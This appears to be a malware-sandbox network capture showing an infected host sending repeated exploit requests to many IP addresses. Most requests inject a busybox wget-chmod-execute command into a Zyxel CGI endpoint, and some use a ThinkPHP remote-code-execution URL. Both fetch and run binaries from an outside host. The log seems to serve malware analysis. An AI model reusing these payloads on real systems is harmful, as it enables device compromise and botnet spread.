Feb 14, 2024 09:31:24.311077118 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:46.838308096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
973	192.168.2.15	45004	31.136.245.97	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.487741947 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:04.183409929 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:05.527381897 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:08.439291000 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:13.815243006 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:24.566791058 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:46.838213921 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
974	192.168.2.15	53204	94.123.141.138	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.513370037 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
975	192.168.2.15	35638	31.200.122.242	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:03.515192986 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
976	192.168.2.15	60010	112.186.20.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:05.727047920 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
977	192.168.2.15	56418	112.127.183.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:05.847532988 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:06.208091021 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:32:29 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
978	192.168.2.15	60762	31.136.10.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.025470018 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:06.711342096 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:08.055447102 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:10.743248940 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:16.119199038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:26.870764971 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:48.886240959 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
979	192.168.2.15	55478	62.29.6.155	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.042203903 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
980	192.168.2.15	35552	94.121.117.102	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.042834044 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
981	192.168.2.15	50144	94.123.188.93	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.043837070 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
982	192.168.2.15	46424	112.90.95.73	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.192446947 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:06.575251102 CET	294	IN	HTTP/1.1 400 Bad Request Server: openresty Date: Wed, 14 Feb 2024 08:31:06 GMT Content-Type: text/html Content-Length: 145 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
983	192.168.2.15	36684	94.121.125.212	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.290883064 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
984	192.168.2.15	41526	94.121.56.32	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.291450024 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
985	192.168.2.15	49514	94.120.174.37	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.292551994 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
986	192.168.2.15	53056	94.121.217.233	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.538546085 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
987	192.168.2.15	58794	94.120.245.10	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.538817883 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
988	192.168.2.15	38190	95.141.101.113	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.544763088 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
989	192.168.2.15	46160	95.101.220.172	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:31:06.716394901 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:31:06.931956053 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:31:06 GMT Date: Wed, 14 Feb 2024 08:31:06 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 66 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 34 36 36 26 23 34 36 3b 32 30 66 39 32 39 38 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is 